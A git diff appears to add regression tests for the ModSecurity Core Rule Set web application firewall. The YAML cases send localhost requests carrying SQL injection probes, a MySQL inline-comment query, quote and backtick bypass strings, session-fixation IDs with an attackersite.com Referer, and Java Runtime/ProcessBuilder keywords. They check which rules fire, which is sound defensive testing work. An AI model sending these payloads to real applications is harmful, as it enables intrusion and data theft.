+ data: "pay='1001'='10"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-6
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "\"2562*23"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-7
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=\":[\"00"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-8
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=`>6fbdec2"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-9
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay='][0]]), strtolower($b[$GLOBALS['"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-10
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=', 2, 1"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-11
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "`>9e7"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-12
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=\":\"65"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-13
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay='\\2nq5"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-14
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=` < 0) AND `"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-15
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay='0:0:6"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-16
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "\":60"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-17
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=\">%5 - type_submit_reset_5"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-18
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "\":35"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-19
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay='3085'='30"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-20
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "\":\"[0,\\x22"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-21
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay='16/17"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-22
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "\";}7b6"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml
new file mode 100644
index 000000000..4b3d8099f
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Franziska Buehler"
+ description: None
+ enabled: true
+ name: 942500.yaml
+tests:
+ - test_title: 942500-1
+ desc: "MySQL in-line comment detection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942500"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
new file mode 100644
index 000000000..13bd38459
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
@@ -0,0 +1,37 @@
+---
+meta:
+ author: "Franziska Buehler"
+ description: None
+ enabled: true
+ name: 942510.yaml
+tests:
+ - test_title: 942510-1
+ desc: "SQLi bypass detected: backticks"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?`bla`"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942510"
+ - test_title: 942510-2
+ desc: "SQLi bypass detected: backticks"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?'bla'"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942510"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
new file mode 100644
index 000000000..0712bb944
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
@@ -0,0 +1,37 @@
+---
+meta:
+ author: "Walter Hop"
+ description: None
+ enabled: true
+ name: 942511.yaml
+tests:
+ - test_title: 942511-1
+ desc: "SQLi bypass detected: quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?`bla`"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942511"
+ - test_title: 942511-2
+ desc: "SQLi bypass detected: quotes"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?'bla'"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942511"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
new file mode 100644
index 000000000..dd9745e8c
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
@@ -0,0 +1,28 @@
+---
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 943100.yaml
+tests:
+ - test_title: 943100-1
+ desc: Session Fixation Attack (943100) from old modsec regressions
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ Referer: http
+ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
+ method: GET
+ port: 80
+ uri: /foo.php?bar=blah
+ version: HTTP/1.1
+ output:
+ log_contains: id "943100"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
new file mode 100644
index 000000000..6526e943b
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
@@ -0,0 +1,81 @@
+---
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 943110.yaml
+tests:
+ - test_title: 943110-1
+ desc: Session Fixation Attack (943110) from old modsec regressions
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Content-Type: application/x-www-form-urlencoded
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ Referer: http://www.attackersite.com/test
+ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-2
+ desc: "session fixation attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Referer: "https://localhost.attackersite.com/"
+ method: GET
+ port: 80
+ uri: "/?phpsessid=asdfdasfadsads"
+ version: HTTP/1.0
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-3
+ desc: "session fixation attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Referer: "https://attackersite.com/"
+ method: GET
+ port: 80
+ uri: "/?phpsessid=asdfdasfadsads"
+ version: HTTP/1.0
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-4
+ desc: Session Fixation Attack (943110) from old modsec regressions
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Content-Type: application/x-www-form-urlencoded
+ Host: localhost
+ Referer: http://localhost/test
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "943110"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
new file mode 100644
index 000000000..df43ef254
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 943120.yaml
+tests:
+ - test_title: 943120-1
+ desc: Session Fixation Attack (943120) from old modsec regressions
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ log_contains: id "943120"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
new file mode 100644
index 000000000..da0fb0c60
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "spartantri"
+ enabled: true
+ name: "944000.yaml"
+ description: "Description"
+tests:
+ - test_title: 944000-1
+ desc: Using text/plain Content-Type which do not have any bodyprocessor associated
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ no_log_contains: "id \"944000\""
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
new file mode 100644
index 000000000..119727b58
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
@@ -0,0 +1,373 @@
+---
+meta:
+ author: "spartantri"
+ enabled: true
+ name: "944100.yaml"
+ description: "Description"
+tests:
+ - test_title: 944100-1
+ desc: Argument test includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/x-www-form-urlencoded"
+ method: POST
+ version: HTTP/1.0
+ data: "test=java.lang.Runtime"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-2
+ desc: Argument test includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "test=java.lang.ProcessBuilder"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-3
+ desc: Argument name includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "java.lang.Runtime=test"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-4
+ desc: Argument name includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "java.lang.ProcessBuilder=test"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-5
+ desc: Cookie test includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: test=java.lang.Runtime
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-6
+ desc: Cookie test includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: test=java.lang.ProcessBuilder
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-7
+ desc: Cookie name includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: java.lang.Runtime=test
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-8
+ desc: Cookie name includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: java.lang.ProcessBuilder=test
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-9
+ desc: Request header test includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ test: java.lang.Runtime
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-10
+ desc: Request header test includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ test: java.lang.ProcessBuilder
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-11
+ desc: XML element includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "value"
+ output:
+ no_log_contains: "id \"944100\""
+ - test_title: 944100-12
+ desc: XML attribute name includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944100\""
+ - test_title: 944100-13
+ desc: XML attribute value includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-14
+ desc: XML element value includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "java.lang.Runtime"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-15
+ desc: XML element includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "value"
+ output:
+ no_log_contains: "id \"944100\""
+ - test_title: 944100-16
+ desc: XML attribute name includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944100\""
+ - test_title: 944100-17
+ desc: XML attribute value includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-18
+ desc: XML element value includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "java.lang.ProcessBuilder"
+ output:
+ log_contains: "id \"944100\""
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
new file mode 100644
index 000000000..6a76e8d5b
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
@@ -0,0 +1,373 @@
+---
+meta:
+ author: "spartantri"
+ enabled: true
+ name: "944110.yaml"
+ description: "Description"
+tests:
+ - test_title: 944110-1
+ desc: Argument test includes keywords java. and Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/x-www-form-urlencoded"
+ method: POST
+ version: HTTP/1.0
+ data: "test=java.Runtime"
+ output:
+ log_contains: "id \"944110\""
+ - test_title: 944110-2
+ desc: Argument test includes keywords java. and ProcessBuilder
